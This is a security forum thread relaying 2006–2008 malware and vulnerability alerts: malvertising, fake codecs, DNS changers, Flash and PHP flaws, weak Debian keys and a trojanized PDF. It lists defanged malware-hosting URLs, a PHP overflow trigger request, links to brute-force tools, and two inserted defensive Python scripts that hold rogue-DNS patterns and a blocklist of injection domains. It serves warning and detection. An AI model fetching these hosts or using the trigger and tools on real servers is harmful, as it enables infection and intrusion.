Alerts


AplusWebMaster
2006-03-24, 20:57
Easily can happen when a visitor to ANY site enters the "names and e-mail addresses of...friends...". If you really want them to visit the site, just send them the URL yourself in an e-mail:

- http://www.techweb.com/article/printableArticle.jhtml?articleID=183702655&site_section=700028
March 24, 2006
"The Federal Trade Commission on Thursday nailed a spammer with a record-setting $900,000 fine for violating the CAN-SPAM Act. According to a complaint filed by the FTC, JumpStart Technologies of San Francisco, Calif. has spammed consumers since 2002, sending millions of messages disguised as personal e-mails in an attempt to hype its FreeFlixTix Web site. JumpStart, charged the FTC, collected e-mail addresses by offering free movie tickets to consumers in exchange for ratting out the names and e-mail addresses of five or more friends...
The spam scam also misled consumers who took the bait and went to FreeFlixTix, with some of the "free" ticket offers requiring credit card registration that in many cases resulted in charges made to the account. JumpStart's FreeFlixTix site is now offline..."

:(

AplusWebMaster
2007-06-20, 14:12
Notes: As always, follow "Best practice...": Keep systems updated with all current MS patches and update/check 3rd party applications [Test here: http://secunia.com/software_inspector/ ].

Hacks -will- take advantage when users don't.


:spider:

AplusWebMaster
2008-04-08, 22:14
FYI...

Malicious Flash Banner Ad - USATODAY.com
- http://securitylabs.websense.com/content/Alerts/3061.aspx
04.08.2008 - "Websense® Security Labs™ has received reports of a malicious Flash banner ad on USATODAY.com, a prominent news web site. The banner ad leads to the download of various spyware and ransomware, appearing as legit anti-virus scanners to the uninitiated... More details about this malicious binary from Microsoft:
http://www.microsoft.com/security/encyclopedia/details.aspx?name=Win32%2fRenos ..."

(Screenshots of banner ad from USATODAY at the Websense URL above.)
----------------------------

Flash Player version 9.0.124.0 released
- http://forums.spybot.info/showpost.php?p=180537&postcount=5
"...Adobe categorizes this as a -critical- update and recommends affected users upgrade to version 9.0.124.0..."

:fear::fear:

AplusWebMaster
2008-04-22, 13:48
FYI...

- http://isc.sans.org/diary.html?storyid=4319
Last Updated: 2008-04-22 00:39:28 UTC - "...“Apocalyptic NEWS Usama Ben Laden” is being SPAMMED out with malicious links in it. This is an attempt to get people to load a version of Zlob. The links... are malicious. DO NOT VISIT THEM. Here is the VirusTotal report on the malware I found there: http://www.virustotal.com/analisis/a914b92b454eff25407a61fa52af9d67 ..."
[Result: 13/32 (40.62%)]

:fear:

AplusWebMaster
2008-04-23, 06:02
FYI...

MySpace - Maximus root kit downloads...
- http://isc.sans.org/diary.html?storyid=4325
Last Updated: 2008-04-22 22:26:50 UTC - "...A reader, GreggS, provided a link to a myspace page with a specific friendid that has JavaScript that pops up a transparent background gif on top of the normal user page. The transparent background gif appears to be an Automatic Update of the Microsoft Malicious Software Removal Tool. This is likely to fool a fair amount of people.
"Clicking anywhere on the page (on large css layer on top) and your browser initiates a download session from an ftp at microsofpsupports .cn and you are asked to download and/or run (no!) the file.
The "Automatic Update" (not "Windows Update") dialog is simply a gif image.
hxxp ://img404.imageshared.cn/img/20048/removaltool6gx87.gif "
This appears to be a new version of Maximus
Virustotal results here:
http://www.virustotal.com/analisis/3a29d07603a0430a74e8aa77bc81e6bb ..."
Result: 10/32 (31.25%)

- http://isc.sans.org/diary.html?storyid=4325
Last Updated: 2008-04-23 17:56:24 UTC ...(Version: 3)
"UPDATE - Thanks to Ned who pointed out that "!Maximus" is the name of the heuristic detection engine for F-Prot (and hence Authentium) rather than the name of the rootkit."

:fear:

AplusWebMaster
2008-04-27, 17:04
FYI...

- http://isc.sans.org/diary.html?storyid=4346
Last Updated: 2008-04-26 18:23:13 UTC - "A new virus was submitted to us today by a friend of ours known as SPAM_Buster. The Spamvertized URL redirects to
hxxp ://www .tera .cartoes1.com/saudlov.scr
This thing had several download stages and to do a complete analysis could take a long time. Ultimately it is some type of spyware/Trojan. I will use VirusTotal and CWSandbox to analyze some of the binaries involved. saudlov.scr: 12/32 "recognized" it. Virus Total Results
http://www.virustotal.com/analisis/021d7c1131b1130f35051d41dfb05370 ...
CWSandbox analysis for saudlov.scr
https://cwsandbox.org/?page=details&id=220785&password=vyagd
Interesting strings in saudlov.scr:
c:\windows\mdword.exe
hxxp ://caixa .nexenservices .com/game/game01.exe
c:\windows\mdword.exe
C:\Arquivos de programas\Internet Explorer\IEXPLORE.EXE
hxxp ://www .terra .com .br/avisolegal/
Looks like it downloads game01.exe and something from
www[dot]terra[dot]com/br/avisolegal/
So I downloaded game01.exe and ran it thru VirusTotal. 1/32 “recognized” it. F-Secure called it "Suspicious:W32/Malware/Gemini"
http://www.virustotal.com/analisis/00e6839634881c4b247c0fa98332ea95 ..."
(Further analysis available at the ISC URL above)

- http://isc.sans.org/diary.html?storyid=4343
Last Updated: 2008-04-26 13:57:49 UTC - "There is something in the air at the moment... my mail box is chock-a-block full of SPAM this week... On Gmail I typically get 5-10 per week, now about 500. On my own mail the anti-SPAM throws away a few hundred per week, this week about 2000..."
(Long list available at the ISC URL above)

:fear::fear:

AplusWebMaster
2008-04-27, 17:25
FYI...

(A weekend mess/uptick of SPAM not helping any - AV's in "catch-up" mode.)

- http://mtc.sri.com/
Most Effective Antivirus Tools Against New Malware Binaries (only "Top 10" shown...)
Sat Apr 26 17:20:29 2008
detects = Antivirus system overall detection rate based on exposure to 1752 malware binaries
rank   detects  missed  analyzed  country  vendor
1st    95%      78      1752      AT       Ikarus Security Software
2nd    92%      133     1752      CZ       Grisoft Inc
3rd    89%      182     1752      DE       Avira
4th    89%      193     1752      RO       BitDefender Inc
5th    88%      208     1752      US       Secure Computing
6th    87%      222     1752      IN       Quick Heal Technologies
7th    83%      284     1752      NO       Norman Inc
8th    82%      309     1752      FI       F-Secure Corporation
9th    82%      310     1752      RU       Kaspersky Lab
10th   80%      334     1752      PL       GNU Open Source..."
-----^^^

More...
- http://mtc.sri.com/live_data/av_rankings/

- http://isc.sans.org/diary.html?storyid=4346
Last Updated: 2008-04-26 18:23:13 UTC

- http://isc.sans.org/diary.html?storyid=4343
Last Updated: 2008-04-26 13:57:49 UTC

- http://www.virus-radar.com/index_c168h_enu.html

:fear::fear:

AplusWebMaster
2008-04-29, 06:18
FYI...

- http://isc.sans.org/diary.html?storyid=4355
Last Updated: 2008-04-29 00:13:50 UTC - "Recently one of our readers, Doug, sent us an ASF file that does something interesting: when you open it in Windows Media Player, it will immediately launch Internet Explorer which will then prompt you to download an executable file. As I don't see this every day, I went to investigate this a bit further. According to Microsoft, the ASF file format (and possibly other formats) allows creation of a script stream. The script stream can use certain, simple, script commands in Windows Media Player. This information is available at http://msdn2.microsoft.com/en-us/library/aa390699(VS.85).aspx

Now, the malicious ASF file we received opened Internet Explorer with the URL pointing to
hxxp ://www.fastmp3player.com/affiliates/772465/1/?embedded=false.
This web site had a further 302 redirect to
hxxp: //www.fastmp3player.com/affiliates/772465/1/PLAY_MP3.exe
(both links are still working), which is some adware and is reasonably detected by 20 out of 32 AV programs on VirusTotal..."

:fear:

AplusWebMaster
2008-04-29, 19:35
FYI...

- http://msmvps.com/blogs/spywaresucks/archive/2008/04/28/1607314.aspx
April 28, 2008 11:52 PM sandi - "The malvertizements discovered on Yahoo are STILL there..."

- http://msmvps.com/blogs/spywaresucks/archive/2008/04/27/1605974.aspx
April 27, 2008 12:21 PM by sandi - "Yahoo aren't listening... And still the problems continue... I wonder how many hits Yahoo gets per day, and how many people are being exposed to fraudware, while these advertisements are allowed to remain online..."

(Screenshots available at the URLs above.)

:fear::fear:

AplusWebMaster
2008-04-30, 14:27
FYI...

- http://isc.sans.org/diary.html?storyid=4361
Last Updated: 2008-04-30 09:27:16 UTC - "Back in November last year we published a diary about Mac DNS changer malware*. The main idea about this was to make Mac users aware that the bad guys are not ignoring this platform any more... the way it was packed showed that the attackers meant real business. All the malware did was change local DNS servers to a couple of servers in a known bad network, and tell the command and control server that a new victim is ready... Only a couple of anti-virus programs detected the original sample (a DMG file). This improved a bit over time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it... it changes the DNS servers and reports to a C&C server. However, one thing I noticed was that the attackers started obfuscating the installation code... it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs... same network as before, so make sure that you are monitoring any DNS requests going there since they indicate you have infected machines on your network..."
* http://isc.sans.org/diary.html?storyid=3595
Last Updated: 2007-11-02 02:36:39 UTC ...(Version: 2) - "... This is a professional attempt at attacking Mac systems... The second thing that folks at Sunbelt noticed ( http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html ) is that when they sent a sample to VirusTotal there were 0 (zero, nada, nilch) products that detected this..."

(More detail at each URL above)

--------------------------------------
Update...

Windows-malware already exists in some ZLOB variants (fake codecs) that will attempt the DNS client hijack - one reference:
- http://ca.com/us/securityadvisor/pest/pest.aspx?id=453119651
Latest DAT Release 03 13 2008 - "This fake codec is actually a hijacker that will change your DNS settings whether you acquire your IP settings through DHCP or set your IP information manually. This hijacker will attempt to re-route all your DNS queries through 85.255.x.29 or 85.255.x.121 (RBN).... rogue DNS servers..."

-or- SpybotS&D
- http://www.safer-networking.org/en/updatehistory/2007-02-02.html
Win32.DNSChanger
- http://www.safer-networking.org/en/updatehistory/2007-03-14.html
Zlob.DNSChanger

:fear:
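The ISC and CA notes above both say the same thing from a defender's side: the hijack is visible in the resolver addresses a host ends up using, so check them against the "85.255.x.29 or 85.255.x.121" pattern the CA advisory quotes. The script below is an added example, not code from either source; the ipconfig excerpt and firewall log lines it scans are constructed, and the 85.255.112.x / 85.255.113.x addresses in them are made-up instances of that pattern.

```python
import re

# Rogue resolver patterns quoted on the page from the CA advisory:
# "85.255.x.29 or 85.255.x.121"; 'x' is a wildcard octet.
ROGUE_DNS_PATTERNS = ("85.255.x.29", "85.255.x.121")

# Dotted quads not glued to other digits (so "185.255.112.29" is not read as 85.255...).
IPV4_RE = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")


def octets(addr):
    """Split a dotted quad into octet strings, or return None if it is not a valid IPv4."""
    parts = addr.split(".")
    if len(parts) != 4 or not all(p.isdigit() and 0 <= int(p) <= 255 for p in parts):
        return None
    return parts


def matches_pattern(addr, pattern):
    """True if every octet equals the pattern octet or the pattern octet is 'x'."""
    a = octets(addr)
    if a is None:
        return False
    return all(p == "x" or p == o for p, o in zip(pattern.split("."), a))


def is_rogue_dns(addr):
    return any(matches_pattern(addr, p) for p in ROGUE_DNS_PATTERNS)


def find_rogue_dns(text):
    """Return rogue resolver addresses found anywhere in text, in order of first appearance.

    Works on ipconfig /all output, resolv.conf, or firewall logs: every dotted quad
    is checked, so a second DNS server on an unlabeled continuation line is not missed.
    """
    hits = []
    for addr in IPV4_RE.findall(text):
        if is_rogue_dns(addr) and addr not in hits:
            hits.append(addr)
    return hits


# Constructed samples (not from the page): an ipconfig /all excerpt from a hijacked
# Windows host (DHCP on, DNS servers overridden) and three firewall log lines.
SAMPLE_IPCONFIG = """\
Ethernet adapter Local Area Connection:
   DHCP Enabled. . . . . . . . . . . : Yes
   IP Address. . . . . . . . . . . . : 192.168.1.23
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 85.255.112.29
                                       85.255.112.121
"""
SAMPLE_FW_LOG = """\
2008-04-30 09:12:01 ALLOW UDP 192.168.1.23:1041 -> 192.168.1.1:53
2008-04-30 09:12:02 ALLOW UDP 192.168.1.23:1042 -> 85.255.113.121:53
2008-04-30 09:12:03 ALLOW TCP 192.168.1.23:1043 -> 208.67.222.222:80
"""

if __name__ == "__main__":
    for name, sample in (("ipconfig", SAMPLE_IPCONFIG), ("firewall", SAMPLE_FW_LOG)):
        hits = find_rogue_dns(sample)
        print(f"{name}: {hits or 'no rogue resolver addresses'}")
```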

AplusWebMaster
2008-05-02, 12:37
FYI...

PHP multiple vulns - update available
- http://secunia.com/advisories/30048/
Release Date: 2008-05-02
Critical: Moderately critical
Impact: Unknown, Security Bypass, DoS, System access
Where: From remote
Solution Status: Vendor Patch
Software: PHP 5.2.x
...The vulnerabilities are reported in versions prior to 5.2.6.
Solution: Update to version 5.2.6.
http://www.php.net/downloads.php

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2051
5/5/2008
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2050
5/5/2008
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0599
5/5/2008

:fear:

AplusWebMaster
2008-05-07, 20:46
FYI...

- http://www.finjan.com/MCRCblog.aspx?EntryId=1949
May 07, 2008 - "During our ongoing research we came up against one curious site. The site is hacking/security oriented, and is written in Russian (hmm... last time I checked it was in the Netherlands), and not significantly different from many other similar sites. The same "news" section with recent exploits. The same "articles" section with same "How to get root on server" paper. And the forum with common "SQL Injection FAQ" thread for newbies. What makes the difference is the "download" section.... I think it's the first time (we've seen) such a comprehensive, well arranged and recently updated collection of trojans, keyloggers, back-door web-shells and, the most interesting for us, attacker toolkits..."
(Screenshots available at the URL above.)
-----------------------------------------------

- http://www.finjan.com/Pressrelease.aspx?id...=1819&lan=3
May 6, 2008 - "Finjan... today announced its discovery of a server controlled by hackers (Crimeserver) containing more than 1.4 Gigabyte of business and personal data stolen from infected PCs. The data consisted of 5,388 unique log files. Both email communications and web-related data were among them. The compromised data came from all around the world and contained information from individuals, businesses, as well as renowned organizations, including healthcare providers. To illustrate the scope; the server contained among others 571 log files from the US, 621 from Germany (DE), 322 from France (FR), 308 from India (IN), 232 from Great Britain (GB), 150 from Spain (ES), 86 from Canada (CA), 58 from Italy (IT), 46 from the Netherlands (NL), and 1,037 from Turkey (TR). Due to the sheer impact, Finjan followed its company guidelines and promptly notified over 40 major international financial institutions located in the US, Europe and India whose customers were compromised as well as various law enforcements around the world.
The report contains examples of compromised data that Finjan found on the Crimeserver, such as:
* Compromised patient data
* Compromised bank customer data
* Business-related email communications
* Captured Outlook accounts containing email communication..."

:fear::fear:

AplusWebMaster
2008-05-08, 13:58
FYI...

Neosploit Updated to Include an Acrobat Exploit
- http://preview.tinyurl.com/6mlnq6
05-05-2008 (Symantec Security Response Blog) - "On about April 18th, Symantec's DeepSight honeypots began capturing a new iteration of the Neosploit exploit toolkit. It appears that the pervasive exploit kit has been updated to take advantage of a circa February 2008 vulnerability in Adobe Acrobat Professional and Reader. What makes this attack vector of particular concern is that it will work reasonably silently through most browsers. If a user is enticed to a hostile Web site (who knows which ones are hostile these days) using the browser of their choice, it is reasonably likely that their computer will become infected provided that they have Acrobat installed on their computer. Although the vulnerability has been patched since early February, I suspect that many users have not applied this patch yet. We highly recommend that if you haven’t done so, go and get the latest patched versions of Adobe Acrobat Reader and Professional from here: http://www.adobe.com/support/security/advisories/apsa08-01.html ..."

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2042
Last revised: 5/8/2008

Security Updates available for Adobe Reader and Acrobat 7 and 8
- http://www.adobe.com/support/security/bulletins/apsb08-13.html
"...Adobe recommends Acrobat 8 users on Windows update to Acrobat 8.1.2...
...Users with Adobe Reader 7.0 through 7.0.9, who cannot upgrade to Reader 8.1.2, should upgrade to Reader 7.1.0..."

Adobe Reader 7.1.0 released
- http://www.adobe.com/support/downloads/detail.jsp?ftpID=3952
5/7/2008 - "The Adobe® Reader® 7.1.0 update addresses a number of customer issues and security vulnerabilities..."

Release notes:
- http://kb.adobe.com/selfservice/viewContent.do?externalId=kb403541&sliceId=1

:fear:

AplusWebMaster
2008-05-10, 03:37
FYI...

- http://securitylabs.websense.com/content/Alerts/3089.aspx
05.09.2008 - "Websense... has detected malicious code hosted on China.com's game site. The malware is a variant of VBS/Redlof and is known to commonly infect files with the extension of "html", "htm", "php", "jsp", "htt", "vbs", and "asp". This malicious download (MD5: e6df57ea75a77112e94036e5138bd063) is placed in a directory that appears to be reserved for game patch downloads. This virus attempts to spread itself by infecting all outbound emails sent by the victim with MS Outlook or Outlook Express. More details on the Microsoft VM ActiveX component vulnerability (MS00-075*)..."
* http://www.microsoft.com/technet/security/bulletin/MS00-075.mspx

(Screenshot available at the Websense URL.)

:fear:

AplusWebMaster
2008-05-13, 00:30
FYI...

- http://preview.tinyurl.com/5zvnrx
May 9, 2008 (Avert Labs blog) - "Sometime back we had come across this interesting vulnerability posted by a Chinese researcher in his blog, claiming to have found a zero day vulnerability in php 5.2.3. We got a chance to dig a bit deeper into this and were able to reproduce the vulnerability based on the information provided in the blog. After investigation, we found that this vulnerability affects not only version 5.2.3 but also version 5.2.5. It is a heap overflow which can be triggered when a web server with PHP receives a malformed URI request; it can be a simple request like "GET /index.php/aa HTTP/1.1". Successful exploitation of this can result in arbitrary code execution with the privileges of the WEB Server... We highly recommend users to update with the latest version of PHP 5.2.6 released*. This patch, besides this issue, fixes a host of other security-related issues, some of which we deem as critical..."
* http://forums.spybot.info/showpost.php?p=188217&postcount=61

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0599
Last revised: 5/9/2008
CVSS v2 Base score: 10.0 (High)

:fear:

AplusWebMaster
2008-05-16, 19:19
- http://isc.sans.org/diary.html?storyid=4421
Last Updated: 2008-05-15 23:16:38 UTC ...(Version: 3)
- http://www.us-cert.gov/current/#debian_openssl_vulnerability
May 15, 2008
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0166
Threatcon - Symantec
- http://www.symantec.com/security_response/threatconlearn.jsp
2008-05-16 05:28 - "ThreatCon is currently at Level 2: Elevated.
The ThreatCon is at level 2. Advisories have been released addressing an issue related to weak key generation in Debian and its variants, such as Ubuntu. Using a weak random number generator in the OpenSSL package, the system generates a weak key when installing services such as Secure Shell (SSH) and OpenVPN. To fix this issue, users are advised to apply available updates for the OpenSSL library and to regenerate all cryptographic keys generated previously by the library. Keys generated from GNUPG and GNUTLS packages are reportedly unaffected. Several tools are already available that allow a brute-force attack against the weak keys. H D Moore has released a database of all weak keys generated for a typical encryption key space:
( http://metasploit.com/users/hdm/tools/debian-openssl/ )
A script to brute-force the keys using that database has also been released on milw0rm by M. Mueller:
( http://www.milw0rm.com/exploits/5622 )
These tools could be used to bypass key-based login for shell services such as SSH. Other potential tools could be used to decrypt traffic such as login information or to forge digital signatures.
The Debian advisory addressing the issue provides information on how to tell if your system was using vulnerable keys. The following Debian and Ubuntu advisories are available:
DSA-1571-1 openssl -- predictable random number generator
( http://www.debian.org/security/2008/dsa-1571 )
USN-612-1: OpenSSL vulnerability
( http://www.ubuntu.com/usn/USN-612-1 ) ."

-----------

AplusWebMaster
2008-05-23, 00:49
FYI...

- http://www.us-cert.gov/current/#cisco_releases_security_advisories2
May 22, 2008 - "Cisco has released three security advisories to address multiple vulnerabilities in Cisco IOS Secure Shell, Service Control Engine, and Voice Portal. These vulnerabilities may allow an attacker to take control of the affected system or cause a denial-of-service condition. US-CERT encourages users to review the following Cisco Security Advisories and apply any necessary updates or workarounds.

* Cisco IOS Secure Shell Denial of Service Vulnerabilities
- http://www.cisco.com/en/US/products/products_security_advisory09186a008099567f.shtml
* Cisco Service Control Engine Denial of Service Vulnerabilities
- http://www.cisco.com/en/US/products/products_security_advisory09186a008099bf65.shtml
* Cisco Voice Portal Privilege Escalation Vulnerability
- http://www.cisco.com/en/US/products/products_security_advisory09186a008099beae.shtml

:fear:

AplusWebMaster
2008-05-23, 01:42
FYI...

- http://sunbeltblog.blogspot.com/2008/05/no-this-is-not-castlecops.html
May 22, 2008 - "No, this is not CastleCops
mezzicodec(dot)net masquerades as the legitimate CastleCops site... The site is mirroring, in near real-time, CastleCops. It seems to be primarily used for SEO purposes and possibly to steal valid user accounts, but could serve malware or exploits. Avoid this site."

- http://sunbeltblog.blogspot.com/2008/05/rash-of-fake-sites-copying-pc-world.html
May 22, 2008 - "As a follow-up to my post earlier today about a fake CastleCops page, there’s more to the story. There are other domains sharing the same IP (207.226.177.250):
pepato org
slim-cash com
spyware-wiper com
Cpaypal com
Crazycounter net
All are copying legitimate sites. Pepato is loading a fake dvdplanet.com page... These domains belong to the "Vladzone" malware gang. A while back, we believe that they were responsible for DDoS attacks against webhelper4u.com (Patrick Jordan, who works for Sunbelt) and spamhuntress.com — and maybe a few others. I would not visit these sites."

(Screenshots available at both Sunbeltblog URLs above.)

:fear::sad::mad::yuck:

AplusWebMaster
2008-05-27, 13:04
FYI...

- http://secunia.com/advisories/30309/
Release Date: 2008-05-22
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: IBM Lotus Sametime 7.x, IBM Lotus Sametime 8.x
...Successful exploitation may allow execution of arbitrary code.
Solution: Update to version 8.0.1 or apply hotfix ICAE-7DPP83 for Lotus Sametime 7.5.1 Cumulative Fix 1 (CF1). Contact IBM support for the patch if Sametime 7.5.1 CF1 is not deployed or if unable to update to 8.0.1.
http://preview.tinyurl.com/5s6mz9
Original Advisory:
IBM: http://www-1.ibm.com/support/docview.wss?uid=swg21303920

- http://www.us-cert.gov/current/#ibm_lotus_sametime_vulnerability
May 22, 2008

- http://isc.sans.org/diary.html?storyid=4460
Last Updated: 2008-05-26 23:54:12 UTC - "Take a look at port 1533*. That's quite an increase in targeted computers reporting via DShield over the past few days..."

* http://isc.sans.org/port.html?port=1533
"...tcp 1533 used by Lotus Sametime for chat and awareness..."

:fear:

AplusWebMaster
2008-05-28, 05:10
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

- http://isc.sans.org/diary.html?storyid=4465
Last Updated: 2008-05-27 18:12:46 UTC ...(Version: 2) - "A vulnerability has been reported in Adobe Flash Player versions 9.0.124.0 and older, which is the current version available...
Update1: Symantec has observed that this issue is being actively exploited in the wild and have elevated their ThreatCon*.
Update2: A SecurityFocus article is now live here**."

ThreatCon is currently at Level 2: Elevated
* http://www.symantec.com/security_response/threatconlearn.jsp
"The DeepSight ThreatCon is being raised to Level 2 in response to the discovery of in-the-wild exploitation of an unspecified and unpatched vulnerability affecting Adobe Flash Player. The flaw occurs when processing a malicious SWF file. At the time of writing, details related to this vulnerability are scarce, but Symantec Security Response has been able to trigger the flaw in some scenarios. We're currently investigating the vulnerability to uncover additional details, including the sites used to host the attack... Currently two Chinese sites are known to be hosting exploits for this flaw: wuqing17173 .cn and woai117 .cn. The sites appear to be exploiting the same flaw, but are using different payloads... Network administrators are advised to blacklist these domains to prevent clients from inadvertently being redirected to them. Further analysis into these attacks, specifically the woai117 .cn attack, uncovered another domain involved dota11 .cn . We have discovered that this site is being actively injected into sites through what is likely SQL injection vulnerabilities. A google search reports approximately 20,000 web pages (not necessarily distinct servers or domains) injected with a script redirecting users to this malicious site..."

** http://www.securityfocus.com/bid/29386

Malicious swf files?
- http://isc.sans.org/diary.html?storyid=4468
Last Updated: 2008-05-27 18:46:44 UTC ...(Version: 2) - "...potentially malicious site found at hxxp ://www .play0nlnie .com/pcd/topics/ff11us/20080311cPxl31/07.jpg
The JPG file is actually a script... Unknown at this time if these SWF files are related to this vulnerability."

:fear:

AplusWebMaster
2008-05-28, 12:39
FYI...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527
May 27, 2008 - 11:16 PM - "...important that you make sure you have updated your Adobe Flash Player to the latest version* (9.0.124.0 at the time of this writing)... it seems that several websites are now taking advantage of a flaw in the Adobe Flash Player previously covered by CVE-2007-0071**. It appears that Symantec started noticing this activity being exploited in the wild and initially labeled it a 0-day threat as they thought it affected 9.0.124.0. However, they have since posted an update*** potentially changing this view. Both Symantec and the Internet Storm Center have posted information surrounding the vulnerability and some of the websites that are actively exploiting it. It would appear this is in fact fully patched with the latest version and is the same vulnerability described by CVE-2007-0071. We decided to look into this a bit more and see what other websites are out there exploiting this vulnerability and what they attempted to install. It did not take us long to find several other websites beyond those already mentioned. It would appear that this exploit has been pretty widely known within the Chinese community for the past two days or so... Did we mention that you should UPGRADE YOUR FLASH PLAYER (if you haven't already)? It's always a good idea to keep your software up-to-date, but it should surely be a priority to do so now..."

* http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

** http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0071
Last revised: 4/25/2008 - "...Adobe Flash Player 9.0.115.0 and earlier..."

*** http://www.symantec.com/security_response/threatcon/index.jsp

- http://blogs.adobe.com/psirt/2008/05/potential_flash_player_issue_u_1.html
May 28, 2008 11:09AM - "...This exploit does NOT appear to include a new, unpatched vulnerability as has been reported elsewhere – customers with Flash Player 9.0.124.0 should not be vulnerable to this exploit. We’re still looking in to the exploit files, and will update everyone with further information as we get it, but for now, we strongly encourage everyone to download and install the latest Flash Player update, 9.0.124.0*..."
* http://www.adobe.com/go/getflashplayer

---------------

Retired: Adobe Flash Player SWF File Remote Code Execution Vulnerability
- http://www.securityfocus.com/bid/29386/discuss
Updated: May 28 2008 07:53PM - "...Further research indicates that this vulnerability is the same issue described in BID 28695** (Adobe Flash Player Multimedia File Remote Buffer Overflow Vulnerability), so this BID is being retired."

** http://www.securityfocus.com/bid/28695/solution
"...The vendor released Flash Player 9.0.124.0 to address this issue..."

AplusWebMaster
2008-05-30, 05:47
FYI...

- http://securitylabs.websense.com/content/Alerts/3096.aspx
05.29.2008 - "Websense... has detected thousands of web sites infected with the recent mass JavaScript injection that exploits a vulnerability in Adobe Flash (CVE-2007-0071*) to deliver its malicious payload... This vulnerability is not a 0-day and users with the latest version of Flash Player (version 9.0.124.0) are safe. However, there are still many on older versions of Flash that are unaware of this mass web infection and are susceptible to this drive-by attack. An update to the latest version of Flash Player is highly recommended**.
Websense ThreatSeeker has been tracking these malicious web sites and have discovered numerous reputable web sites that are now unwilling participants, infecting their very own visitors. These sites are from various industries such as government, education, healthcare, finance, media, and entertainment. This attack also attempts to exploit other popular vulnerabilities such as MDAC, RealPlayer, and various ActiveX controls... drive-by threat... site screenshots from: Microsoft, Dept. of Education (Australia), PBS, Durex, CDC (Centers for Disease Control and Prevention), Discovery Channel, various universities and a Pakistani district government."

* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0071
Last revised: 4/25/2008 - "...Adobe Flash Player 9.0.115.0 and earlier..."

** http://www.adobe.com/go/getflashplayer

(Screenshots available at the Websense URL above.)

:fear:
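The Symantec ThreatCon note (May 28) and the Websense alert above describe the same defender-side symptom: a legitimate site's pages end up carrying an injected script or frame that loads from one of the redirect domains, and administrators are told to blocklist those domains. The scanner below is an added example, not code from Symantec, Websense or ISC: it pulls the external script/iframe/embed/object references out of a page and flags any whose host is one of the domains the alerts name (kept defanged in the source as the post prints them). The sample page it scans is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Redirect domains named in the Symantec and Websense alerts above, kept
# defanged (space before the TLD) exactly as the forum post prints them.
DEFANGED_BLOCKLIST = ("wuqing17173 .cn", "woai117 .cn", "dota11 .cn")


def refang(domain):
    """Turn a defanged 'example .cn' into a comparable hostname."""
    return domain.replace(" ", "").lower()


BLOCKLIST = frozenset(refang(d) for d in DEFANGED_BLOCKLIST)


def host_of(url):
    """Hostname of a src/data URL, or None for relative references."""
    url = url.strip()
    if url.startswith("//"):          # protocol-relative reference
        url = "http:" + url
    host = urlsplit(url).hostname
    return host.lower() if host else None


def is_blocklisted(host):
    """True for a listed domain or any of its subdomains."""
    if not host:
        return False
    return host in BLOCKLIST or any(host.endswith("." + d) for d in BLOCKLIST)


class ExternalRefCollector(HTMLParser):
    """Collects the external resources a page loads via script/iframe/embed/object."""

    TAGS = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = self.TAGS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.refs.append((tag, value))


def find_injected_refs(html):
    """Return (tag, url) pairs in html whose host is on the blocklist."""
    collector = ExternalRefCollector()
    collector.feed(html)
    collector.close()
    return [(tag, url) for tag, url in collector.refs if is_blocklisted(host_of(url))]


# Constructed sample page (not from the original post): a legitimate site page
# with an injected script and hidden iframe appended after </html>, which is
# where a SQL-injected footer typically lands.
SAMPLE_PAGE = (
    "<html><head><title>News</title>\n"
    '<script src="/static/app.js"></script>\n'
    '<script src="//cdn.example.com/lib.js"></script>\n'
    "</head><body><p>Welcome.</p></body></html>\n"
    f'<script src="http://www.{refang("dota11 .cn")}/js.js"></script>\n'
    f'<iframe src="http://{refang("woai117 .cn")}/x.htm" width=0 height=0></iframe>\n'
)

if __name__ == "__main__":
    for tag, url in find_injected_refs(SAMPLE_PAGE):
        print(f"injected <{tag}> referencing {url}")
```

Run it over a crawl of your own site's rendered pages; legitimate relative and CDN references pass through untouched, so every hit is worth a look.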

AplusWebMaster
2008-06-01, 18:47
FYI...

DHS PDF
- http://www.f-secure.com/weblog/archives/00001449.html
June 1, 2008 - "...The only information we have on this 130kB sample is that it was named f1be1cdea0bcc5a1574a10771cd4e8e8.pdf (after its MD5 hash) and that it was submitted on the 23rd of May. Looks like a Department of Homeland Security form G-325A.
Look again. What's the filename? It's -not- f1be1cdea0bcc5a1574a10771cd4e8e8.pdf. It's 0521.pdf. This is -not- the document we opened. So what happens here? Apparently this PDF has been used in a targeted attack against an unknown target. When this PDF is opened in Acrobat Reader, it uses a known exploit to drop files. Specifically, it creates two files in the TEMP folder: D50E.tmp.exe and 0521.pdf. Then it executes the EXE and launches the clean 0521.pdf file to Adobe Reader in order to fool the user that everything is all right. D50E.tmp.exe is a backdoor that creates lots of new files with innocent-sounding filenames, including:
\windows\system32\avifil16.dll
\windows\system32\avifil64.dll
\windows\system32\drivers\pcictrl.sys
\windows\system32\drivers\Nullbak.dat
\windows\system32\drivers\Beepbak.dat
